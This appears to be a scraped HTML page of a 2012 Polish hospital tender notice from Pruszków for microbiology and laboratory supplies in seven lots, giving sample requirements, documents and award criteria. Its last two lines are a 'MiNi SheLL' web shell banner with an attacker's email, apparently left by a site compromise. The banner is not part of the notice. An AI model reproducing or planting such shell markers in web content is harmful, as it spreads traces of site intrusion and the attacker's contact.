 5. Oświadczenie o  zapewnieniu dostarczania   odczynników do oznaczania elektrolitów i dostępności serwisu     
     przez 2 lata - załącznik nr 7 (złożyć w przypadku oferty na VII pakiet).
6. Oświadczenie o dostarczeniu certyfikatu kontroli jakości do każdej serii dostarczanego podłoża - załącznik    
     nr 9 (złożyć w przypadku oferty na podłoża ).
7. Próbki w ilościach:

Do pakietu nr I:  minimum po dwie płytki podłóż:  Chrom agar do bakterii wyhodowanych z moczu,  podłoże selektywne dla paciorkowców, BHI bez krwi, Muellr Hinton II agar + 5% KK + NAD, Columbia agar  +5% KB.  Po minimum 100 mL podłuż: podłoże Christensena w mod. Hormaecha i Munila, Kligler agar. Po minimum 3 probówki: podłoże Motility. Korzystając z posiadanych szczepów wzrostowych ocenimy czułość i wybiórczość wzrostu bakterii oraz będą sprawdzane też szybkość rozpuszczania podłóż oraz łatwość rozlewania na płytkach.

Do pakietu nr II:  minimum po dwa szeregi do identyfikacji Enterobacteriaceae / 10 lub 20 parametrowe / oraz potrzebne do tej identyfikacji odczynniki. Będą sprawdzane specyficzność i wyrazistość reakcji dla szczepów wzorcowych.

Do pakietu nr III:  minimum po 10 krążków antybiotyków: Ampicillin2, Cefoxicin 30, Timentin (Ticarcillin/Clavulan Acid 75/10).1 opakowanie jednostkowe dowolnego antybiotyku wymienionego w pakiecie 3 (mogą być wymienione powyżej).  Należy podać producenta proponowanych krążków antybiotykowych. Będą sprawdzane strefy zahamowań wzrostu  dla szczepów wzorcowych oraz łatwość wyjmowania krążków z opakowania jednostkowego.                    

Do pakietu nr IV:  Należy przysłać informacje odnośnie ilości testów w opakowaniu.     

Do pakietu nr V:  Należy przysłać próbki testów do pozycji 1 (minimum 2 testy) oraz dostarczyć instrukcje w języku polskim dla wszystkich testów.

Do pakietu nr VI:  Należy przysłać ulotkę z metodyką oznaczania glukozy.

Do pakietu nr VII:  Należy  złożyć w ofercie oświadczenie o  zapewnieniu dostarczania odczynników i dostępności serwisu przez 2 lata.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy - wypełniony i podpisany przez wykonawcę - załącznik nr 1 do SIWZ/umowy
2) wypełnione tabele asortymentowo-ilościowe załącznik nr 2
3) Projekt umowy parafowany na każdej zapisanej stronie - załącznik nr  3a (pakiety 1-6), załącznik nr 3b     
    (pakiet 7) w zależności od oferowanego pakietu. 
4) Dokumenty potwierdzające posiadanie pełnomocnictwa osób składających  ofertę, o ile nie wynika to z  
     przedstawionych dokumentów rejestrowych.   
5) Oświadczenie o odbiorze odpadów niebezpiecznych i sposobie ich odbioru  - załącznik nr 8

UWAGA!!! Nie należy zmieniać numeracji załączników nadanej przez Zamawiającego.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1)	Zmiany cen brutto pod warunkiem zmian stawek celno - granicznych i podatku VAT w stopniu wynikającym z tych zmian.. 
2)	Obniżenia cen przedmiotu zamówienia pod warunkiem zgody obu stron  umowy, w przypadku zmniejszenia cen rynkowych</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Szpital Kolejowy SP ZOZ  w Pruszkowie ul. Warsztatowa 1 , pokój zamówień publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.11.2012 godzina 10:30, miejsce: Szpital Kolejowy SP ZOZ  w Pruszkowie ul. Warsztatowa 1 , pokój zamówień publicznych.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> podłoża.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szczegółowy opis zawierają tabele asortymentowo-ilościowe stanowiące załącznik nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> testy do identyfikacji bakterii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szczegółowy opis zawierają tabele asortymentowo-ilościowe stanowiące załącznik nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> krążki do antybiogramów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szczegółowy opis zawierają tabele asortymentowo-ilościowe stanowiące załącznik nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> paski z antybiotykami, z gradientem stężeń.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szczegółowy opis zawierają tabele asortymentowo-ilościowe stanowiące załącznik nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> szybkie testy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szczegółowy opis zawierają tabele asortymentowo-ilościowe stanowiące załącznik nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> odczynniki do oznaczania glukozy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szczegółowy opis zawierają tabele asortymentowo-ilościowe stanowiące załącznik nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> odczynniki do oznaczania elektrolitów na aparacie AVL 988-3 oraz materiały zużywalne do aparatu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> szczegółowy opis zawierają tabele asortymentowo-ilościowe stanowiące załącznik nr 2 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com